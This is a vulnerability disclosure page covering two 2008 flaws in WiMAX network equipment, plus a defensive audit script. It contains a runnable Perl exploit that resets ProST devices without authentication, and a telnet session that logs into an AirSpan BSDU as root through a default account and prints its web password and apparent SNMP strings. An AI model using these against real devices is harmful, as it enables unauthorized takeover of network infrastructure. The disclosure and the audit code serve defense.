ProST web access authentication bypass (publication date 8.03.2008)

A remote, unauthenticated attacker may be able to gain access to a vulnerable device and make arbitrary changes to its configuration.

#!/usr/bin/perl -w

########################################
#                                      #
# US-CERT VU#248372, example           #
# by Arthur Lashin diriger@gmail.com   #
#                                      #
########################################

use strict;
use LWP::UserAgent;

unless (defined $ARGV[0]) {
    die "\nUsage: $0 prost_ip\n\n";
}

my $ip = $ARGV[0];

&prost_reset_to_default($ip);

sub prost_reset_to_default {
    my $ip = shift;
    my $timeout = 20;

    my $html_body = undef;

    my $ua = LWP::UserAgent->new;
    $ua->timeout($timeout);
    my %form = ('DialogText' => 'to+reset+to+default', 'Advanced' => 16);
    my $response = $ua->post('http://' . $ip . '/process_adv/', \%form);
    if ($response->is_success) {
        $html_body = $response->content;
        print $html_body;
    } else {
        print "Connect to $ip failed: " . $response->status_line . "\n";
    }

    return $html_body;
}

Vulnerability fixed 9.03.2008 in ss-6.5.40.71.z


Base Station Distribution Unit (BSDU) backdoor (publication date 18.03.2008)

AirSpan BSDU has a serious security hole that allows anyone to gain remote access to the device with root privileges through undocumented telnet access that is enabled by default. This is possible because all BSDUs share the same root password:

[root@diriger]# telnet 192.168.1.254
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.
bsdu-wimax login: root
~ # uname -ar
Linux bsdu-wimax 2.6.16.19-default #31 PREEMPT Wed Oct 10 18:45:13 IST 2007 ppc unknown
~ #
~ # cd /root/shared/system
/root/shared/system # ls -lF
-rw-r--r-- 1 root root 4 Feb 26 08:17 activeBank
-rw-r--r-- 1 root root 256 Feb 26 08:15 bank1metadata
-rw-r--r-- 1 root root 27073 Feb 26 08:18 bank1verification
-rw-r--r-- 1 root root 256 Sep 5 2007 bank2metadata
-rw-r--r-- 1 root root 27073 Sep 6 2007 bank2verification
-rw-r--r-- 1 root root 223 Mar 11 14:51 cfgsh.conf
/root/shared/system #
/root/shared/system # cat ./cfgsh.conf
# WiMAX BSDU Configuration Shell config file
ifconf static
ip 192.168.1.254
nmask 255.255.255.0
gw 192.168.1.1
ns 10.0.0.1
sntps 10.0.0.2
httplp admin,k5Rw2SDcTi
snmproc w3E56G_0&
snmprwc kY^$ds_*
mvlan 15

Here “k5Rw2SDcTi” is the web access password. One can edit the file ./cfgsh.conf and reboot the device to apply new settings.

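An added example, not part of the original advisory: a fleet audit that parses cfgsh.conf backups in the "key value" format shown above and reports which devices keep secrets in the clear and which devices share the same one, using hash fingerprints so the report never prints a secret. The sample configs are constructed, and reading snmproc/snmprwc as SNMP community strings is an assumption.

```python
import hashlib
from collections import defaultdict
# Keys treated as secrets. "httplp" carries the web login per the page; reading
# snmproc/snmprwc as SNMP community strings is an assumption of this example.
SECRET_KEYS = ("httplp", "snmproc", "snmprwc")

def parse_cfgsh(text):
    """Parse 'key value' lines, skipping blank lines and '#' comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            conf[key] = value.strip()
    return conf

def fingerprint(secret):
    """Short SHA-256 prefix, so a report can show reuse without the secret."""
    return hashlib.sha256(secret.encode()).hexdigest()[:12]

def audit_fleet(configs):
    """configs maps device name -> cfgsh.conf text. Returns (cleartext, reused):
    sorted (device, key) pairs and {(key, fingerprint): devices} for shared secrets."""
    cleartext, seen = [], defaultdict(list)
    for device, text in sorted(configs.items()):
        conf = parse_cfgsh(text)
        for key in SECRET_KEYS:
            value = conf.get(key, "")
            # httplp is "user,password": only the part after the comma is secret
            secret = value.partition(",")[2] if key == "httplp" else value
            if secret:
                cleartext.append((device, key))
                seen[(key, fingerprint(secret))].append(device)
    reused = {k: v for k, v in seen.items() if len(v) > 1}
    return sorted(cleartext), reused

# Constructed backups; addresses and secrets are made up for the example.
SAMPLE = {
    "bsdu-a": "# config\nifconf static\nip 192.0.2.10\n"
              "httplp admin,Example-Pass-1\nsnmproc example-ro\nsnmprwc example-rw\n",
    "bsdu-b": "ip 192.0.2.11\nhttplp admin,Example-Pass-1\nsnmproc other-ro\n",
    "bsdu-c": "ip 192.0.2.12\nmvlan 15\n",
}

if __name__ == "__main__":
    cleartext, reused = audit_fleet(SAMPLE)
    print("cleartext secrets:", cleartext)
    for (key, fp), devices in reused.items():
        print(f"{key} secret {fp} shared by: {', '.join(devices)}")
```
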
BSR unauthorized web & telnet access (publication deprecated)
